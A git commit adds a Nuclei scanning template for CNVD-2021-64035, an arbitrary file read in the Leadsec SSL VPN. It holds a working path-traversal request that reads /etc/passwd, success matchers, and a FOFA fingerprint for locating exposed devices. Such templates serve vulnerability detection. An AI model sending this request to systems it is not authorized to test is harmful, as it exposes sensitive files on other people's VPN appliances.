Merge pull request #10219 from projectdiscovery/CNVD-2021-64035

Create CNVD-2021-64035.yaml
2024-07-09 14:29:25 +05:30 · 2024-07-09 14:29:25 +05:30 · 9e6a46f225
parent 8c444fa05c 19de67434a
commit 9e6a46f225
1 changed files with 38 additions and 0 deletions
--- a/http/cnvd/2024/CNVD-2021-64035.yaml
+++ b/http/cnvd/2024/CNVD-2021-64035.yaml
@ -0,0 +1,38 @@
+id: CNVD-2021-64035
+
+info:
+  name: Leadsec VPN - Arbitrary File Read
+  author: xiaoWangSec
+  severity: high
+  description: |
+    There is an information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., and attackers can use the vulnerability to obtain sensitive information.
+  reference:
+    - https://avd.aliyun.com/detail?id=AVD-2021-888761
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-64035
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: icon_hash="-15980305"
+  tags: cnvd,cnvd2024,lfi,leadsec,vpn
+
+http:
+  - raw:
+      - |
+        GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "appframe"
+
+      - type: status
+        status:
+          - 200